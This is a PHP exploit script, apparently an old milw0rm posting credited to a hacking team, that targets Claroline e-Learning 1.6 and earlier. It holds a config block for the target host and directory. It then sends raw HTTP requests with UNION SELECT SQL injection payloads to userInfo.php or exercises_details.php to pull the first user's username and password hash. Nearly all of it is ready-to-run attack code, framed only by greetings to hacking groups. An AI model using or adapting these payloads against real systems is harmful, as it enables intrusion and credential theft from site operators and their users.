Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit

&#60;?php ############################################################################# # T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ############################################################################# # Vulnerable: Claroline E-Learning Application # # Exploit By : MH_p0rtal # # Discovered By: Sieg Fried # ############################################################################# # Gr33tz To ==&#62; Alpha_programmer , Oil_karchack , Dr_CephaleX , Str0ke # # And Iranian Hacking & Security Teams : # IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , # Crouz Security Team & Simorgh-ev Security Team ############################################################################# # ___________Config : # please replace your address : $url = &#34;http:///www.example.com&#34;; # Please replace your name file ( userInfo.php Or exercises_details.php ) $file1 = &#34;userInfo.php&#34;; # please replace your dir address : $dirs = &#34;/dir/to/claroline/user/&#34;; # __________End Config ############################################################################# if ( $file1 == &#34;userInfo.php&#34; ) { $merg = $dirs.$file1; $fc = fsockopen(&#34;$url&#34;, 80, $errno, $errstr, 30); if (!$fc) { echo &#34;Can&#39;t Connect\n&#34;; } else { $mh = &#34;GET $merg?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/* HTTP/1.1\r\n&#34;; $mh .= &#34;Host: $url\r\n&#34;; $mh .= &#34;Connection: Close\r\n\r\n&#34;; fwrite($fc, $mh); while (!feof($fc)) { echo fgets($fc, 1024); } fclose($fc); } } //------------------------------------------------------------------------------------------- if ( $file1 == &#34;exercises_details.php&#34; ) { $merg = $dirs.$file1; $fc = fsockopen(&#34;$url&#34;, 80, $errno, $errstr, 30); if (!$fc) { echo &#34;Can&#39;t Connect\n&#34;; } else { $mh = &#34;GET $merg?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- HTTP/1.1\r\n&#34;; $mh .= &#34;Host: $url\r\n&#34;; $mh .= &#34;Connection: Close\r\n\r\n&#34;; fwrite($fc, $mh); while (!feof($fc)) { echo fgets($fc, 1024); } fclose($fc); } } ?&#62; // milw0rm.com [2005-06-17]